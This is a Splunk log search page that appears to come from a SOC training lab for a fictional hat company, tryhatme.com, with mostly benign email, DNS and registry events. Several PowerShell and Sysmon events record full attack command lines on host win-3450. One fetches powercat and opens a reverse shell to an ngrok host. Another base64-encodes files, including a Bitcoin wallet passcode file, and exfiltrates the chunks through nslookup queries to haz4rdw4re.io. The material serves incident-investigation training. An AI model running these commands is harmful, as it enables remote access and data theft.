

New Search

1 index=main | top 5 src

Last 48 hours

✓ 313 events (1/9/26 3:00:00.000 PM to 1/11/26 3:40:35.000 PM) No Event Sampling

Events (313)

Format Timeline 1 hour per column

SELECTED FIELDS

a host 1  
a source 1  
a sourcetype 1

INTERESTING FIELDS

a attachment 3  
a content 73  
a datasource 3  
a direction 3  
a event.action 9  
# event.code 7  
a file.path 18  
a host.name 13  
a index 1  
# linecount 1  
a process.command\_line 44  
a process.name 24  
# process.parent.pid 46  
# process.pid 100+  
a process.working\_directory 15  
a punct 75  
a recipient 61  
a sender 54  
a splunk\_server 1  
a subject 72  
a timestamp 100+

14 more fields  
+ Extract New Fields (/en-US/app/search/field\_extractor?sid=1768146035.43)

Time	Event
1/11/26 3:32:25.633 PM	<pre>{ [-]   attachment: forceupdate.ps1   content: Michelle, here's the updated script. Th is version should work better - just run it when yo u get a chance.   datasource: email   direction: internal   recipient: michelle.smith@tryhatme.com   sender: yani.zubair@tryhatme.com   subject: Force update fix   timestamp: 01/11/2026 15:32:25.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:31:53.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreat e)   event.code: 1   host.name: win-3456   process.command_line: C:\Windows\system32\rundll 32.exe C:\Windows\system32\inetcp1.cpl,ClearMyTrack sByProcess Flags:276824072 WinX:0 WinY:0 IEFram e:0000000000000000   process.name: rundll32.exe   process.parent.name: iexplore.exe   process.parent.pid: 3937   process.pid: 3829   process.working_directory: C:\Users\safa.prince \Desktop\   timestamp: 01/11/2026 15:31:53.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:31:51.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Registry object added or deleted (rule: RegistryEvent)   event.code: 12   host.name: win-3450   process.name: spoolsv.exe   process.pid: 3824   registry.key: System\CurrentControlSet\Control\Class\{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}\0003\DriverVersion   registry.path: HKLM\System\CurrentControlSet\Control\Class\{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}\0003\DriverVersion   registry.value: DriverVersion   timestamp: 01/11/2026 15:31:51.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:31:51.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Registry value set (rule: Registry Event)   event.code: 13   host.name: win-3452   process.pid: 3764   registry.key: System\CurrentControlSet\Enum\SWD\PRINTENUM\{1E7F5481-8BCC-4426-B671-08BCD04848A0}\FriendlyName   registry.path: HKLM\System\CurrentControlSet\Enum\SWD\PRINTENUM\{1E7F5481-8BCC-4426-B671-08BCD04848A0}\FriendlyName   registry.value: FriendlyName   timestamp: 01/11/2026 15:31:51.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:31:37.633 PM	<pre>{ [-]   attachment: None   content: Will there be a recording available for those unable to attend live   datasource: email   direction: inbound   recipient: cain.omoore@tryhatme.com   sender: osman@stylewatchjournal.com   subject: RE: RE: Seminar Registration: Hat Industry Innovation Trends   timestamp: 01/11/2026 15:31:37.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:31:34.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreate)   event.code: 1   host.name: win-3449   process.command_line: "C:\Program Files\Internet Explorer\iexplore.exe" -startmanager -Embedding   process.name: iexplore.exe   process.parent.pid: 3987   process.pid: 3903   process.working_directory: C:\Windows\system32\   timestamp: 01/11/2026 15:31:34.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:31:11.633 PM	<pre>{ [-]   datasource: sysmon   dns.answers.data: 172.16.1.15   dns.question.name: mailsrv-01.tryhatme.com   dns.resolved_ip: 172.16.1.15   event.action: Dns query (rule: DnsQuery)   event.code: 22   host.name: win-3452   network.protocol: dns   process.name: OUTLOOK.EXE   process.pid: 3968   timestamp: 01/11/2026 15:31:11.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:31:03.633 PM	<pre>{ [-]   attachment: None   content: This is getting ridiculous-why is this still unresolved?   datasource: email   direction: internal   recipient: sophie.j@tryhatme.com   sender: sophie.j@tryhatme.com   subject: RE: RE: Concerns over IHateHats.tech   timestamp: 01/11/2026 15:31:03.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:30:56.633 PM	<pre>{ [-]   attachment: None   content: Travel through time and experience the evolution of hats from ancient Egypt to futuristic Mars Only 500 per ticket   datasource: email   direction: inbound   recipient: contact@tryhatme.com   sender: josephine@gmail.com   subject: Time Traveling Hat Adventure Explore An cient Lands for Cheap   timestamp: 01/11/2026 15:30:56.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:30:43.633 PM	<pre>{ [-]   attachment: None   content: Please review and confirm availability for the proposed meeting time   datasource: email   direction: inbound   recipient: contact@tryhatme.com   sender: day@stylishhatboutique.com   subject: FWD: Scheduling a Virtual Meeting to Di scuss Market Trends   timestamp: 01/11/2026 15:30:43.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:30:43.633 PM	<pre>{ [-]   attachment: None   content: Thank you for the opportunity I confir m my availability and look forward to speaking with your team   datasource: email   direction: outbound   recipient: duke@trendsettingtrilbies.com   sender: invoice@tryhatme.com   subject: RE: Job Interview Invitation: Exciting Career Opportunity   timestamp: 01/11/2026 15:30:43.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:30:33.633 PM	<pre>{ [-]   attachment: None   content: The upcoming seminar will cover the latest innovations in hat manufacturing and design. Secure your spot today.   datasource: email   direction: outbound   recipient: barker@hatcouturecompany.net   sender: sophie.j@tryhatme.com   subject: Seminar Registration: Hat Industry Innovation Trends   timestamp: 01/11/2026 15:30:33.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:30:29.633 PM	<pre>{ [-]   attachment: None   content: Here is a summary of our last discussion along with action items for the next steps. Let us know if you have any modifications.   datasource: email   direction: outbound   recipient: duke@stylewatchjournal.com   sender: roger.fedora@tryhatme.com   subject: Follow-up on Previous Discussion: Next Steps for Engagement   timestamp: 01/11/2026 15:30:29.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:30:21.633 PM	<pre>{ [-]   attachment: None   content: Your feedback matters—take a few minutes to fill this out.   datasource: email   direction: internal   recipient: michelle.smith@tryhatme.com   sender: michelle.smith@tryhatme.com   subject: Hat-titude Check: Employee Feedback Survey   timestamp: 01/11/2026 15:30:21.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:30:04.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Registry value set (rule: Registry Event)   event.code: 13   host.name: win-3456   process.pid: 3878   registry.key: System\CurrentControlSet\Enum\SWD \PRINTENUM\{49455221-FA52-47F9-826D-B41CFD35E447}\F riendlyName   registry.path: HKLM\System\CurrentControlSet\Enu m\SWD\PRINTENUM\{49455221-FA52-47F9-826D-B41CFD35E4 47}\FriendlyName   registry.value: FriendlyName   timestamp: 01/11/2026 15:30:04.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:29:52.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Registry value set (rule: Registry Event)   event.code: 13   host.name: win-3458   process.name: spoolsv.exe   process.pid: 3613   registry.key: System\CurrentControlSet\Control\D eviceClasses\{0ecef634-6ef0-472a-8085-5ad023ecbccd} \##?#SWD#PRINTENUM#{1E7F5481-8BCC-4426-B671-08BCD04 848A0}\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\Dev ice Parameters\FriendlyName   registry.path: HKLM\System\CurrentControlSet\Con trol\DeviceClasses\{0ecef634-6ef0-472a-8085-5ad023e cbccd}\##?#SWD#PRINTENUM#{1E7F5481-8BCC-4426-B671-0 8BCD04848A0}\{0ecef634-6ef0-472a-8085-5ad023ecbccd} \#\Device Parameters\FriendlyName   registry.value: FriendlyName   timestamp: 01/11/2026 15:29:52.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:29:50.633 PM	<pre>{ [-]   datasource: sysmon   dns.answers.data: 172.16.1.10   dns.question.name: DC-01.tryhatme.com   dns.resolved_ip: 172.16.1.10   event.action: Dns query (rule: DnsQuery)   event.code: 22   host.name: win-3453   network.protocol: dns   process.name: OUTLOOK.EXE   process.pid: 3821   timestamp: 01/11/2026 15:29:50.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:29:12.633 PM	<pre>{ [-]   datasource: sysmon   dns.answers.data: 172.16.1.10   dns.question.name: DC-01.tryhatme.com   dns.resolved_ip: 172.16.1.10   event.action: Dns query (rule: DnsQuery)   event.code: 22   host.name: win-3455   network.protocol: dns   process.name: OUTLOOK.EXE   process.pid: 3851   timestamp: 01/11/2026 15:29:12.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:28:58.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Registry object added or deleted (rule: RegistryEvent)   event.code: 12   host.name: win-3453   process.name: spoolsv.exe   process.pid: 3888   registry.key: System\CurrentControlSet\Enum\SWD \PRINTENUM\{2D00BA8B-3E7F-4C85-88E7-D1E9D13350F0}\F riendlyName   registry.path: HKLM\System\CurrentControlSet\Enu m\SWD\PRINTENUM\{2D00BA8B-3E7F-4C85-88E7-D1E9D13350 F0}\FriendlyName   registry.value: FriendlyName   timestamp: 01/11/2026 15:28:58.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:54.633 PM	<pre>{ [-]   attachment: None   content: Interviews set for next week. Check yo ur calendars for slots.   datasource: email   direction: internal   recipient: safa.prince@tryhatme.com   sender: safa.prince@tryhatme.com   subject: Hiring Update - Interview Schedule   timestamp: 01/11/2026 15:28:54.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:28:48.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Registry value set (rule: Registry Event)   event.code: 13   host.name: win-3451   process.name: spoolsv.exe   process.pid: 3623   registry.key: System\CurrentControlSet\Control\D eviceClasses\{0ecef634-6ef0-472a-8085-5ad023ecbccd} \##?#SWD#PRINTENUM#{49455221-FA52-47F9-826D-B41CFD3 5E447}#{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\Dev ice Parameters\FriendlyName   registry.path: HKLM\System\CurrentControlSet\Con trol\DeviceClasses\{0ecef634-6ef0-472a-8085-5ad023e cbccd}\##?#SWD#PRINTENUM#{49455221-FA52-47F9-826D-B 41CFD35E447}#{0ecef634-6ef0-472a-8085-5ad023ecbccd} \#\Device Parameters\FriendlyName   registry.value: FriendlyName   timestamp: 01/11/2026 15:28:48.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:28:44.633 PM	<pre>{ [-]   datasource: sysmon   dns.answers.data: 172.16.1.10   dns.question.name: DC-01.tryhatme.com   dns.resolved_ip: 172.16.1.10   event.action: Dns query (rule: DnsQuery)   event.code: 22   host.name: win-3457   network.protocol: dns   process.name: OUTLOOK.EXE   process.pid: 3814   timestamp: 01/11/2026 15:28:44.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>



Time	Event
1/11/26 3:28:31.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: . Context Information:   DetailSequence=1 DetailTotal=1   SequenceNumber=5745   UserId=SSF \michael.ascot   HostName=ConsoleHost   HostVersion =5.1.20348.1366   HostId=bbaf2919-3765-42de-b254-1953 f32951cb   HostApplication=C:\Windows\System32 \WindowsPowerShell\v1.0\powershell.exe -c IEX(New-Ob bject System.Net.WebClient).DownloadString('http s://raw.githubusercontent.com/besimorhino/powercat/ master/powercat.ps1'); powercat -c 2.tcp.ngrok.io - p 19282 -e powershell   EngineVersion=5.1.20348.136 6   RunspaceId=b980ae09-17ad-4495-b218-4b1e5219 0205   PipelineId=1   ScriptName=   CommandLine = Details: CommandInvocation(Out-Default): "Out-Def ault"   powershell.command.invocation_details.value: "Ou t-Default"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -c IEX(New-Object S ystem.Net.WebClient).DownloadString('https://raw.gi thubusercontent.com/besimorhino/powercat/master/pow ercat.ps1'); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell   timestamp: 01/11/2026 15:28:31.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <p>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</p>

Time	Event
1/11/26 3:28:31.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line:      \$FuncVars["Process"]   Stop-Process. Cont ext Information:      DetailSequence=1      Det ailTotal=1      SequenceNumber=5741      UserId=SSF \michael.ascot  HostName=ConsoleHost  HostVersion =5.1.20348.1366  HostId=bbaf2919-3765-42de-b254-1953 f32951cb      HostApplication=C:\Windows\System32 \WindowsPowerShell\v1.0\powershell.exe -c IEX(New-Ob bject System.Net.WebClient).DownloadString('http s://raw.githubusercontent.com/besimorhino/powercat/ master/powercat.ps1'); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell  EngineVersion=5.1.20348.136 6      RunspaceId=b980ae09-17ad-4495-b218-4b1e5219 0205  PipelineId=1  ScriptName=      CommandLine =      \$FuncVars["Process"]   Stop-Process Details: C ommandInvocation(Stop-Process): "Stop-Process"Param eterBinding(Stop-Process): name="InputObject"; valu e="System.Diagnostics.Process (powershell)"   powershell.command.invocation_details.value: "St op-Process", "System.Diagnostics.Process (powershel l)"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -c IEX(New-Object S ystem.Net.WebClient).DownloadString('https://raw.gi thubusercontent.com/besimorhino/powercat/master/pow ercat.ps1'); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell   timestamp: 01/11/2026 15:28:31.633   winlog.process.pid: - }</pre> <div>Show as raw text</div> <div>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</div>

Time	Event
1/11/26 3:28:22.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\BitcoinWalletPasscodes.txt")); \$base64 -split '{1,30}'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=485  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=59  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\BitcoinWalletPasscodes.txt")); \$base64 -spl it '{1,30}'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup RmYjEyNGZi MTY1NjZlZlQ==.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup RmYjEyNGZiMTY1NjZlZlQ==. haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:22.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:22.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreate)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nslookup.exe" RmYjEyNGZiMTY1NjZlZlQ==.haz4rdw4re.io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 3648   process.working_directory: C:\Users\michael.ascott\downloads\   timestamp: 01/11/2026 15:28:22.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>
1/11/26 3:28:22.633 PM	<pre>{ [-]   datasource: sysmon   event.action: Process Create (rule: ProcessCreate)   event.code: 1   host.name: win-3450   process.command_line: "C:\Windows\system32\nslookup.exe" VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm.haz4rdw4re.io   process.name: nslookup.exe   process.parent.name: powershell.exe   process.parent.pid: 3728   process.pid: 3700   process.working_directory: C:\Users\michael.ascott\downloads\   timestamp: 01/11/2026 15:28:22.633 }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:22.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\BitcoinWalletPasscodes.txt")); \$base64 -split '{1,30}'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=483  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=59  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\BitcoinWalletPasscodes.txt")); \$base64 -spl it '{1,30}'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup VEhNezE00TczMjFmNGY2ZjA1OWE1Mm.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup VEhNezE00TczMjFmNGY2ZjA 1OWE1Mm.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:22.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:22.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\BitcoinWalletPasscodes.txt")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=487  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=59  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\BitcoinWalletPasscodes.txt")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Where-Object): "W here-Object"ParameterBinding(Where-Object): name="F ilterScript"; value=" \$_ -ne '' "CommandInvocation (ForEach-Object): "ForEach-Object"ParameterBinding (ForEach-Object): name="Process"; value="Invoke-Exp ression "nslookup \$_.haz4rdw4re.io""ParameterBindin g(Where-Object): name="InputObject"; value="Paramet erBinding(Where-Object): name="InputObject"; value ="VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm"ParameterBinding(F orEach-Object): name="InputObject"; value="VEhNezE0 OTczMjFmNGY2ZjA1OWE1Mm"ParameterBinding(Where-Objec t): name="InputObject"; value="ParameterBinding(Wh ere-Object): name="InputObject"; value="RmYjEyNGZiM TY1NjZlZlQ=="ParameterBinding(ForEach-Object): name ="InputObject"; value="RmYjEyNGZiMTY1NjZlZlQ=="Param eterBinding(Where-Object): name="InputObject"; valu e=""   powershell.command.invocation_details.value: "Wh ere-Object", " \$_ -ne '' ", "ForEach-Object", "Invo ke-Expression "nslookup \$_.haz4rdw4re.io", "", "VE hNezE0OTczMjFmNGY2ZjA1OWE1Mm", "VEhNezE0OTczMjFmNGY 2ZjA1OWE1Mm", "", "RmYjEyNGZiMTY1NjZlZlQ==", "RmYjEy NGZiMTY1NjZlZlQ==", ""   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:22.633   winlog.process.pid: - }</pre>

Time	Event
	Show as raw text
	host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26	{ [-]
3:28:14.633 PM	<b>attachment:</b> None
	<b>content:</b> I have checked my schedule and I will be attending Looking forward to meeting everyone and exchanging ideas
	<b>datasource:</b> email
	<b>direction:</b> outbound
	<b>recipient:</b> conor@yahoo.com
	<b>sender:</b> michael.ascot@tryhatme.com
	<b>subject:</b> RE: Invitation to a Business Networking Luncheon Next Week
	<b>timestamp:</b> 01/11/2026 15:28:14.633
	}
	Show as raw text
	host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=461  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AAAABbAAAA SW52ZXN0b3JQcmVzZW50.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup AAAABbAAAAASW52ZXN0b3JQc mVzZW50.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>



Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=455  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AABDbGllbn RQb3J0Zm9saW9TdW1tYX.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup AABDbGllbnRQb3J0Zm9saW9 TdW1tYX.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
1/11/26 3:28:07.633 PM	<pre>{ [-]   datasource: powershell   event.action: Pipeline Execution Details   file.path: -   host.name: win-3450   message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:      DetailSeque nce=1  DetailTotal=1  SequenceNumber=453  Use rId=SSF\michael.ascot  HostName=ConsoleHost  Hos tVersion=5.1.20348.1366  HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass  EngineVersion=5.1.20348.136 6  RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280  PipelineId=53  ScriptName=  CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AAAI8AAAAb AAAAAAAAAAAAAAAAAAAA.haz4rdw4re.io"   powershell.command.invocation_details.value: "In voke-Expression", "nslookup AAAI8AAAAbAAAAAAAAAAAA AAAAAAAA.haz4rdw4re.io"   powershell.command.name: -   powershell.file.script_block_text: -   process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass   timestamp: 01/11/2026 15:28:07.633   winlog.process.pid: - }</pre> <p>Show as raw text</p> <pre>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</pre>

Time	Event
